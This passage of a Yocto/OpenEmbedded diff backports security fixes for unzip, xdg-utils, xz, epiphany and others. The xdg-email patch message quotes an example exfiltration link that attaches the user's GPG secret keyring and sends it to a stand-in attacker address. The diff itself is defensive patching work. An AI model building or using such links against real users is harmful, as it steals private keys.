+# "slim" is the default since 2020b
+# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
+ZIC_FMT ?= "slim"
+
 do_compile () {
         for zone in ${TZONES}; do \
-            ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
+            ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
                 ${S}/${zone} ; \
-            ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
+            ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
                 ${S}/${zone} ; \
-            ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
+            ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
                 ${S}/${zone} ; \
         done
 }
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
new file mode 100644
index 0000000000..6ba2b879a3
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2021-4217.patch
@@ -0,0 +1,67 @@
+From 731d698377dbd1f5b1b90efeb8094602ed59fc40 Mon Sep 17 00:00:00 2001
+From: Nils Bars <nils.bars@t-online.de>
+Date: Mon, 17 Jan 2022 16:53:16 +0000
+Subject: [PATCH] Fix null pointer dereference and use of uninitialized data
+
+This fixes a bug that causes use of uninitialized heap data if `readbuf` fails
+to read as many bytes as indicated by the extra field length attribute.
+Furthermore, this fixes a null pointer dereference if an archive contains an
+`EF_UNIPATH` extra field but does not have a filename set.
+---
+ fileio.c  | 5 ++++-
+ process.c | 6 +++++-
+ 2 files changed, 9 insertions(+), 2 deletions(-) 
+---
+
+Patch from:
+https://bugs.launchpad.net/ubuntu/+source/unzip/+bug/1957077
+https://launchpadlibrarian.net/580782282/0001-Fix-null-pointer-dereference-and-use-of-uninitialized-data.patch
+Regenerated to apply without offsets.
+
+CVE: CVE-2021-4217
+
+Upstream-Status: Pending [infozip upstream inactive]
+
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+
+
+diff --git a/fileio.c b/fileio.c
+index 14460f3..1dc319e 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2301,8 +2301,11 @@ int do_string(__G__ length, option)   /* return PK-type error code */
+             seek_zipf(__G__ G.cur_zipfile_bufstart - G.extra_bytes +
+                       (G.inptr-G.inbuf) + length);
+         } else {
+-            if (readbuf(__G__ (char *)G.extra_field, length) == 0)
++            unsigned bytes_read = readbuf(__G__ (char *)G.extra_field, length);
++            if (bytes_read == 0)
+                 return PK_EOF;
++            if (bytes_read != length)
++                return PK_ERR;
+             /* Looks like here is where extra fields are read */
+             if (getZip64Data(__G__ G.extra_field, length) != PK_COOL)
+             {
+diff --git a/process.c b/process.c
+index 5f8f6c6..de843a5 100644
+--- a/process.c
++++ b/process.c
+@@ -2058,10 +2058,14 @@ int getUnicodeData(__G__ ef_buf, ef_len)
+           G.unipath_checksum = makelong(offset + ef_buf);
+           offset += 4;
+ 
++          if (!G.filename_full) {
++            /* Check if we have a unicode extra section but no filename set */
++            return PK_ERR;
++          }
++
+           /*
+            * Compute 32-bit crc
+            */
+-
+           chksum = crc32(chksum, (uch *)(G.filename_full),
+                          strlen(G.filename_full));
+ 
+-- 
+2.32.0
+
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
new file mode 100644
index 0000000000..1c1e120deb
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0529.patch
@@ -0,0 +1,39 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0529
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/process.c b/process.c
+index d2a846e..99b9c7b 100644
+--- a/process.c
++++ b/process.c
+@@ -2507,13 +2507,15 @@ char *wide_to_local_string(wide_string, escape_all)
+   char buf[9];
+   char *buffer = NULL;
+   char *local_string = NULL;
++  size_t buffer_size;
+ 
+   for (wsize = 0; wide_string[wsize]; wsize++) ;
+ 
+   if (max_bytes < MAX_ESCAPE_BYTES)
+     max_bytes = MAX_ESCAPE_BYTES;
+ 
+-  if ((buffer = (char *)malloc(wsize * max_bytes + 1)) == NULL) {
++  buffer_size = wsize * max_bytes + 1;
++  if ((buffer = (char *)malloc(buffer_size)) == NULL) {
+     return NULL;
+   }
+ 
+@@ -2552,7 +2554,11 @@ char *wide_to_local_string(wide_string, escape_all)
+       /* no MB for this wide */
+         /* use escape for wide character */
+         char *escape_string = wide_to_escape_string(wide_string[i]);
+-        strcat(buffer, escape_string);
++        size_t buffer_len = strlen(buffer);
++        size_t escape_string_len = strlen(escape_string);
++        if (buffer_len + escape_string_len + 1 > buffer_size)
++          escape_string_len = buffer_size - buffer_len - 1;
++        strncat(buffer, escape_string, escape_string_len);
+         free(escape_string);
+     }
+   }
diff --git a/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
new file mode 100644
index 0000000000..363dafddc9
--- /dev/null
+++ b/meta/recipes-extended/unzip/unzip/CVE-2022-0530.patch
@@ -0,0 +1,33 @@
+https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1010355
+
+CVE: CVE-2022-0530
+Upstream-Status: Inactive-Upstream [need a new release]
+
+diff --git a/fileio.c b/fileio.c
+index 6290824..77e4b5f 100644
+--- a/fileio.c
++++ b/fileio.c
+@@ -2361,6 +2361,9 @@ int do_string(__G__ length, option)   /* return PK-type error code */
+                   /* convert UTF-8 to local character set */
+                   fn = utf8_to_local_string(G.unipath_filename,
+                                             G.unicode_escape_all);
++                  if (fn == NULL)
++                    return PK_ERR;
++
+                   /* make sure filename is short enough */
+                   if (strlen(fn) >= FILNAMSIZ) {
+                     fn[FILNAMSIZ - 1] = '\0';
+diff --git a/process.c b/process.c
+index d2a846e..715bc0f 100644
+--- a/process.c
++++ b/process.c
+@@ -2605,6 +2605,8 @@ char *utf8_to_local_string(utf8_string, escape_all)
+   int escape_all;
+ {
+   zwchar *wide = utf8_to_wide_string(utf8_string);
++  if (wide == NULL)
++    return NULL;
+   char *loc = wide_to_local_string(wide, escape_all);
+   free(wide);
+   return loc;
+
diff --git a/meta/recipes-extended/unzip/unzip_6.0.bb b/meta/recipes-extended/unzip/unzip_6.0.bb
index c1ea0a9a2c..fa57c8f5bd 100644
--- a/meta/recipes-extended/unzip/unzip_6.0.bb
+++ b/meta/recipes-extended/unzip/unzip_6.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities for extracting and viewing files in .zip archives"
 HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
 SECTION = "console/utils"
 LICENSE = "BSD-3-Clause"
 LIC_FILES_CHKSUM = "file://LICENSE;md5=94caec5a51ef55ef711ee4e8b1c69e29"
@@ -25,12 +26,18 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/infozip/UnZip%206.x%20%28latest%29/UnZip%206.0/
 	file://CVE-2019-13232_p1.patch \
 	file://CVE-2019-13232_p2.patch \
 	file://CVE-2019-13232_p3.patch \
+        file://CVE-2021-4217.patch \
+        file://CVE-2022-0529.patch \
+        file://CVE-2022-0530.patch \
 "
 UPSTREAM_VERSION_UNKNOWN = "1"
 
 SRC_URI[md5sum] = "62b490407489521db863b523a7f86375"
 SRC_URI[sha256sum] = "036d96991646d0449ed0aa952e4fbe21b476ce994abc276e49d30e686708bd37"
 
+# Patch from https://bugzilla.redhat.com/attachment.cgi?id=293893&action=diff applied to 6.0 source
+CVE_CHECK_WHITELIST += "CVE-2008-0888"
+
 # exclude version 5.5.2 which triggers a false positive
 UPSTREAM_CHECK_REGEX = "unzip(?P<pver>(?!552).+)\.tgz"
 
diff --git a/meta/recipes-extended/watchdog/watchdog_5.15.bb b/meta/recipes-extended/watchdog/watchdog_5.15.bb
index 1acab2e9e7..0adf1fbb41 100644
--- a/meta/recipes-extended/watchdog/watchdog_5.15.bb
+++ b/meta/recipes-extended/watchdog/watchdog_5.15.bb
@@ -18,6 +18,10 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/watchdog/watchdog-${PV}.tar.gz \
 SRC_URI[md5sum] = "678c32f6f35a0492c9c1b76b4aa88828"
 SRC_URI[sha256sum] = "ffdc865137ad5d8e53664bd22bad4de6ca136d1b4636720320cb52af0c18947c"
 
+# Can be dropped when the output next changes, avoids failures after
+# reproducibility issues
+PR = "r1"
+
 UPSTREAM_CHECK_URI = "http://sourceforge.net/projects/watchdog/files/watchdog/"
 UPSTREAM_CHECK_REGEX = "/watchdog/(?P<pver>(\d+[\.\-_]*)+)/"
 
@@ -28,6 +32,7 @@ CFLAGS += "-I${STAGING_INCDIR}/tirpc"
 LDFLAGS += "-ltirpc"
 
 EXTRA_OECONF += " --disable-nfs "
+CACHED_CONFIGUREVARS += "ac_cv_path_PATH_SENDMAIL=${sbindir}/sendmail"
 
 INITSCRIPT_PACKAGES = "${PN} ${PN}-keepalive"
 
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
new file mode 100644
index 0000000000..948b9e22e9
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/1f199813e0eb0246f63b54e9e154970e609575af.patch
@@ -0,0 +1,58 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?= <joerg@thalheim.io>
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim <joerg@thalheim.io>
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+Upstream-Status: Backport
+CVE: CVE-2020-27748
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+ 
+ run_thunderbird()
+ {
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+     THUNDERBIRD="$1"
+     MAILTO=$(echo "$2" | sed 's/^mailto://')
+     echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+     BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+     SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+     BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-    ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+ 
+     if [ -z "$TO" ] ; then
+         NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+         NEWMAILTO="${NEWMAILTO},$BODY"
+     fi
+ 
+-    if [ -n "$ATTACH" ] ; then
+-        NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+-    fi
+-
+     NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+     DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+     "$THUNDERBIRD" -compose "$NEWMAILTO"
+-- 
+GitLab
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
new file mode 100644
index 0000000000..383634ad53
--- /dev/null
+++ b/meta/recipes-extended/xdg-utils/xdg-utils/CVE-2022-4055.patch
@@ -0,0 +1,165 @@
+From f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780 Mon Sep 17 00:00:00 2001
+From: Gabriel Corona <gabriel.corona@enst-bretagne.fr>
+Date: Thu, 25 Aug 2022 23:51:45 +0200
+Subject: [PATCH] Disable special support for Thunderbird in xdg-email (fixes
+ CVE-2020-27748, CVE-2022-4055)
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xdg/xdg-utils/-/commit/f67c4d1f8bd2e3cbcb9eb49f5e897075e7426780]
+CVE: CVE-2022-4055
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ scripts/xdg-email.in | 108 -------------------------------------------
+ 1 file changed, 108 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 13ba2d5..b700679 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -30,76 +30,8 @@ _USAGE
+ 
+ #@xdg-utils-common@
+ 
+-run_thunderbird()
+-{
+-    local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+-    THUNDERBIRD="$1"
+-    MAILTO=$(echo "$2" | sed 's/^mailto://')
+-    echo "$MAILTO" | grep -qs "^?"
+-    if [ "$?" = "0" ] ; then
+-        MAILTO=$(echo "$MAILTO" | sed 's/^?//')
+-    else
+-        MAILTO=$(echo "$MAILTO" | sed 's/^/to=/' | sed 's/?/\&/')
+-    fi
+-
+-    MAILTO=$(echo "$MAILTO" | sed 's/&/\n/g')
+-    TO=$(/bin/echo -e $(echo "$MAILTO" | grep '^to=' | sed 's/^to=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    CC=$(/bin/echo -e $(echo "$MAILTO" | grep '^cc=' | sed 's/^cc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+-    SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+-    BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+-
+-    if [ -z "$TO" ] ; then
+-        NEWMAILTO=
+-    else
+-        NEWMAILTO="to='$TO'"
+-    fi
+-    if [ -n "$CC" ] ; then
+-        NEWMAILTO="${NEWMAILTO},cc='$CC'"
+-    fi
+-    if [ -n "$BCC" ] ; then
+-        NEWMAILTO="${NEWMAILTO},bcc='$BCC'"
+-    fi
+-    if [ -n "$SUBJECT" ] ; then
+-        NEWMAILTO="${NEWMAILTO},$SUBJECT"
+-    fi
+-    if [ -n "$BODY" ] ; then
+-        NEWMAILTO="${NEWMAILTO},$BODY"
+-    fi
+-
+-    NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+-    DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+-    "$THUNDERBIRD" -compose "$NEWMAILTO"
+-    if [ $? -eq 0 ]; then
+-        exit_success
+-    else
+-        exit_failure_operation_failed
+-    fi
+-}
+-
+ open_kde()
+ {
+-    if [ -n "$KDE_SESSION_VERSION" ] && [ "$KDE_SESSION_VERSION" -ge 5 ]; then
+-        local kreadconfig=kreadconfig$KDE_SESSION_VERSION
+-    else
+-        local kreadconfig=kreadconfig
+-    fi
+-
+-    if which $kreadconfig >/dev/null 2>&1; then
+-        local profile=$($kreadconfig --file emaildefaults \
+-                                     --group Defaults --key Profile)
+-        if [ -n "$profile" ]; then
+-            local client=$($kreadconfig --file emaildefaults \
+-                                        --group "PROFILE_$profile" \
+-                                        --key EmailClient \
+-                                  | cut -d ' ' -f 1)
+-
+-            if echo "$client" | grep -Eq 'thunderbird|icedove'; then
+-                run_thunderbird "$client" "$1"
+-            fi
+-        fi
+-    fi
+-
+     local command
+     case "$KDE_SESSION_VERSION" in
+         '') command=kmailservice ;;
+@@ -130,15 +62,6 @@ open_kde()
+ 
+ open_gnome3()
+ {
+-    local client
+-    local desktop
+-    desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+-    client=`desktop_file_to_binary "$desktop"`
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     if gio help open 2>/dev/null 1>&2; then
+         DEBUG 1 "Running gio open \"$1\""
+         gio open "$1"
+@@ -159,13 +82,6 @@ open_gnome3()
+ 
+ open_gnome()
+ {
+-    local client
+-    client=`gconftool-2 --get /desktop/gnome/url-handlers/mailto/command | cut -d ' ' -f 1` || ""
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     if gio help open 2>/dev/null 1>&2; then
+         DEBUG 1 "Running gio open \"$1\""
+         gio open "$1"
+@@ -231,15 +147,6 @@ open_flatpak()
+ 
+ open_generic()
+ {
+-    local client
+-    local desktop
+-    desktop=`xdg-mime query default "x-scheme-handler/mailto"`
+-    client=`desktop_file_to_binary "$desktop"`
+-    echo $client | grep -E 'thunderbird|icedove' > /dev/null 2>&1
+-    if [ $? -eq 0 ] ; then
+-        run_thunderbird "$client" "$1"
+-    fi
+-
+     xdg-open "$1"
+     local ret=$?
+ 
+@@ -364,21 +271,6 @@ while [ $# -gt 0 ] ; do
+         shift
+         ;;
+ 
+-      --attach)
+-        if [ -z "$1" ] ; then
+-            exit_failure_syntax "file argument missing for --attach option"
+-        fi
+-        check_input_file "$1"
+-        file=`readlink -f "$1"` # Normalize path
+-        if [ -z "$file" ] || [ ! -f "$file" ] ; then
+-            exit_failure_file_missing "file '$1' does not exist"
+-        fi
+-
+-        url_encode "$file"
+-        options="${options}attach=${result}&"
+-        shift
+-        ;;
+-
+       -*)
+         exit_failure_syntax "unexpected option '$parm'"
+         ;;
+-- 
+2.25.1
+
diff --git a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
index d371c5c28c..f6989430f5 100644
--- a/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
+++ b/meta/recipes-extended/xdg-utils/xdg-utils_1.1.3.bb
@@ -20,6 +20,8 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=a5367a90934098d6b05af3b746405014"
 SRC_URI = "https://portland.freedesktop.org/download/${BPN}-${PV}.tar.gz \
            file://0001-Reinstate-xdg-terminal.patch \
            file://0001-Don-t-build-the-in-script-manual.patch \
+           file://1f199813e0eb0246f63b54e9e154970e609575af.patch \
+           file://CVE-2022-4055.patch \
           "
 
 SRC_URI[md5sum] = "902042508b626027a3709d105f0b63ff"
diff --git a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
index 6e43f5be6f..765a34e842 100644
--- a/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
+++ b/meta/recipes-extended/xinetd/xinetd_2.3.15.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Socket-based service activation daemon"
 HOMEPAGE = "https://github.com/xinetd-org/xinetd"
+DESCRIPTION = "xinetd is a powerful replacement for inetd, xinetd has access control mechanisms, extensive logging capabilities, the ability to make services available based on time, can place limits on the number of servers that can be started, and has deployable defence mechanisms to protect against port scanners, among other things."
 
 # xinetd is a BSD-like license
 # Apple and Gentoo say BSD here.
@@ -12,7 +13,7 @@ PR = "r2"
 # Blacklist a bogus tag in upstream check
 UPSTREAM_CHECK_GITTAGREGEX = "xinetd-(?P<pver>(?!20030122).+)"
 
-SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https \
+SRC_URI = "git://github.com/xinetd-org/xinetd.git;protocol=https;branch=master \
       file://xinetd.init \
       file://xinetd.conf \
       file://xinetd.default \
diff --git a/meta/recipes-extended/xz/xz/CVE-2022-1271.patch b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
new file mode 100644
index 0000000000..7841a534d3
--- /dev/null
+++ b/meta/recipes-extended/xz/xz/CVE-2022-1271.patch
@@ -0,0 +1,96 @@
+From 6bb2369742f9ff0451c245e8ca9b9dfac0cc88ba Mon Sep 17 00:00:00 2001
+From: Lasse Collin <lasse.collin@tukaani.org>
+Date: Tue, 29 Mar 2022 19:19:12 +0300
+Subject: [PATCH] xzgrep: Fix escaping of malicious filenames (ZDI-CAN-16587).
+
+Malicious filenames can make xzgrep to write to arbitrary files
+or (with a GNU sed extension) lead to arbitrary code execution.
+
+xzgrep from XZ Utils versions up to and including 5.2.5 are
+affected. 5.3.1alpha and 5.3.2alpha are affected as well.
+This patch works for all of them.
+
+This bug was inherited from gzip's zgrep. gzip 1.12 includes
+a fix for zgrep.
+
+The issue with the old sed script is that with multiple newlines,
+the N-command will read the second line of input, then the
+s-commands will be skipped because it's not the end of the
+file yet, then a new sed cycle starts and the pattern space
+is printed and emptied. So only the last line or two get escaped.
+
+One way to fix this would be to read all lines into the pattern
+space first. However, the included fix is even simpler: All lines
+except the last line get a backslash appended at the end. To ensure
+that shell command substitution doesn't eat a possible trailing
+newline, a colon is appended to the filename before escaping.
+The colon is later used to separate the filename from the grep
+output so it is fine to add it here instead of a few lines later.
+
+The old code also wasn't POSIX compliant as it used \n in the
+replacement section of the s-command. Using \<newline> is the
+POSIX compatible method.
+
+LC_ALL=C was added to the two critical sed commands. POSIX sed
+manual recommends it when using sed to manipulate pathnames
+because in other locales invalid multibyte sequences might
+cause issues with some sed implementations. In case of GNU sed,
+these particular sed scripts wouldn't have such problems but some
+other scripts could have, see:
+
+    info '(sed)Locale Considerations'
+
+This vulnerability was discovered by:
+cleemy desu wayo working with Trend Micro Zero Day Initiative
+
+Thanks to Jim Meyering and Paul Eggert discussing the different
+ways to fix this and for coordinating the patch release schedule
+with gzip.
+
+Upstream-Status: Backport [https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch]
+CVE: CVE-2022-1271
+
+Signed-off-by: Ralph Siemsen <ralph.siemsen@linaro.org>
+---
+ src/scripts/xzgrep.in | 20 ++++++++++++--------
+ 1 file changed, 12 insertions(+), 8 deletions(-)
+
+diff --git a/src/scripts/xzgrep.in b/src/scripts/xzgrep.in
+index a1fd19c..da1e65b 100644
+--- a/src/scripts/xzgrep.in
++++ b/src/scripts/xzgrep.in
+@@ -178,22 +178,26 @@ for i; do
+          { test $# -eq 1 || test $no_filename -eq 1; }; then
+       eval "$grep"
+     else
++      # Append a colon so that the last character will never be a newline
++      # which would otherwise get lost in shell command substitution.
++      i="$i:"
++
++      # Escape & \ | and newlines only if such characters are present
++      # (speed optimization).
+       case $i in
+       (*'
+ '* | *'&'* | *'\'* | *'|'*)
+-        i=$(printf '%s\n' "$i" |
+-            sed '
+-              $!N
+-              $s/[&\|]/\\&/g
+-              $s/\n/\\n/g
+-            ');;
++        i=$(printf '%s\n' "$i" | LC_ALL=C sed 's/[&\|]/\\&/g; $!s/$/\\/');;
+       esac
+-      sed_script="s|^|$i:|"
++
++      # $i already ends with a colon so don't add it here.
++      sed_script="s|^|$i|"
+ 
+       # Fail if grep or sed fails.
+       r=$(
+         exec 4>&1
+-        (eval "$grep" 4>&-; echo $? >&4) 3>&- | sed "$sed_script" >&3 4>&-
++        (eval "$grep" 4>&-; echo $? >&4) 3>&- |
++            LC_ALL=C sed "$sed_script" >&3 4>&-
+       ) || r=2
+       exit $r
+     fi >&3 5>&-
diff --git a/meta/recipes-extended/xz/xz_5.2.4.bb b/meta/recipes-extended/xz/xz_5.2.4.bb
index 1c4450a9e9..6d80a4f2e9 100644
--- a/meta/recipes-extended/xz/xz_5.2.4.bb
+++ b/meta/recipes-extended/xz/xz_5.2.4.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Utilities for managing LZMA compressed files"
 HOMEPAGE = "https://tukaani.org/xz/"
+DESCRIPTION = "XZ Utils is free general-purpose data compression software with a high compression ratio. XZ Utils were written for POSIX-like systems, but also work on some not-so-POSIX systems. XZ Utils are the successor to LZMA Utils."
 SECTION = "base"
 
 # The source includes bits of PD, GPLv2, GPLv3, LGPLv2.1+, but the only file
@@ -22,7 +23,9 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=97d554a32881fee0aa283d96e47cb24a \
                     file://lib/getopt.c;endline=23;md5=2069b0ee710572c03bb3114e4532cd84 \
                     "
 
-SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz"
+SRC_URI = "https://tukaani.org/xz/xz-${PV}.tar.gz \
+           file://CVE-2022-1271.patch \
+           "
 SRC_URI[md5sum] = "5ace3264bdd00c65eeec2891346f65e6"
 SRC_URI[sha256sum] = "b512f3b726d3b37b6dc4c8570e137b9311e7552e8ccbab4d39d47ce5f4177145"
 UPSTREAM_CHECK_REGEX = "xz-(?P<pver>\d+(\.\d+)+)\.tar"
diff --git a/meta/recipes-extended/zip/zip_3.0.bb b/meta/recipes-extended/zip/zip_3.0.bb
index c00a932763..18b5d8648e 100644
--- a/meta/recipes-extended/zip/zip_3.0.bb
+++ b/meta/recipes-extended/zip/zip_3.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Compressor/archiver for creating and modifying .zip files"
 HOMEPAGE = "http://www.info-zip.org"
+DESCRIPTION = "Info-ZIP's purpose is to provide free, portable, high-quality versions of the Zip and UnZip compressor-archiver utilities that are compatible with the DOS-based PKZIP by PKWARE, Inc."
 SECTION = "console/utils"
 
 LICENSE = "BSD-3-Clause"
@@ -19,6 +20,12 @@ UPSTREAM_VERSION_UNKNOWN = "1"
 SRC_URI[md5sum] = "7b74551e63f8ee6aab6fbc86676c0d37"
 SRC_URI[sha256sum] = "f0e8bb1f9b7eb0b01285495a2699df3a4b766784c1765a8f1aeedf63c0806369"
 
+# Disputed and also Debian doesn't consider a vulnerability
+CVE_CHECK_WHITELIST += "CVE-2018-13410"
+
+# Not for zip but for smart contract implementation for it
+CVE_CHECK_WHITELIST += "CVE-2018-13684"
+
 # zip.inc sets CFLAGS, but what Makefile actually uses is
 # CFLAGS_NOOPT.  It will also force -O3 optimization, overriding
 # whatever we set.
diff --git a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
index ddb4c2794f..f43bfd6a67 100644
--- a/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
+++ b/meta/recipes-gnome/epiphany/epiphany_3.34.4.bb
@@ -1,4 +1,7 @@
 SUMMARY = "WebKit based web browser for GNOME"
+DESCRIPTION = "Epiphany is an open source web browser for the Linux desktop environment. \
+It provides a simple and easy-to-use internet browsing experience."
+HOMEPAGE = "https://wiki.gnome.org/Apps/Web"
 BUGTRACKER = "https://gitlab.gnome.org/GNOME/epiphany"
 LICENSE = "GPLv3+"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
@@ -13,6 +16,7 @@ REQUIRED_DISTRO_FEATURES = "x11 opengl"
 
 SRC_URI = "${GNOME_MIRROR}/${GNOMEBN}/${@gnome_verdir("${PV}")}/${GNOMEBN}-${PV}.tar.${GNOME_COMPRESS_TYPE};name=archive \
            file://0002-help-meson.build-disable-the-use-of-yelp.patch \
+           file://CVE-2022-29536.patch \
            "
 SRC_URI[archive.md5sum] = "a559f164bb7d6cbeceb348648076830b"
 SRC_URI[archive.sha256sum] = "60e190fc07ec7e33472e60c7e633e04004f7e277a0ffc5e9cd413706881e598d"
diff --git a/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
new file mode 100644
index 0000000000..71cfc1238a
--- /dev/null
+++ b/meta/recipes-gnome/epiphany/files/CVE-2022-29536.patch
@@ -0,0 +1,46 @@
+CVE: CVE-2022-29536
+Upstream-Status: Backport [ https://gitlab.gnome.org/GNOME/epiphany/-/commit/486da133569ebfc436c959a7419565ab102e8525 ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+From 486da133569ebfc436c959a7419565ab102e8525 Mon Sep 17 00:00:00 2001
+From: Michael Catanzaro <mcatanzaro@redhat.com>
+Date: Fri, 15 Apr 2022 18:09:46 -0500
+Subject: [PATCH] Fix memory corruption in ephy_string_shorten()
+
+This fixes a regression that I introduced in 232c613472b38ff0d0d97338f366024ddb9cd228.
+
+I got my browser stuck in a crash loop today while visiting a website
+with a page title greater than ephy-embed.c's MAX_TITLE_LENGTH, the only
+condition in which ephy_string_shorten() is ever used. Turns out this
+commit is wrong: an ellipses is a multibyte character (three bytes in
+UTF-8) and so we're writing past the end of the buffer when calling
+strcat() here. Ooops.
+
+Shame it took nearly four years to notice and correct this.
+
+Part-of: <https://gitlab.gnome.org/GNOME/epiphany/-/merge_requests/1106>
+---
+ lib/ephy-string.c | 5 ++---
+ 1 file changed, 2 insertions(+), 3 deletions(-)
+
+diff --git a/lib/ephy-string.c b/lib/ephy-string.c
+index 35a148ab32..8e524d52ca 100644
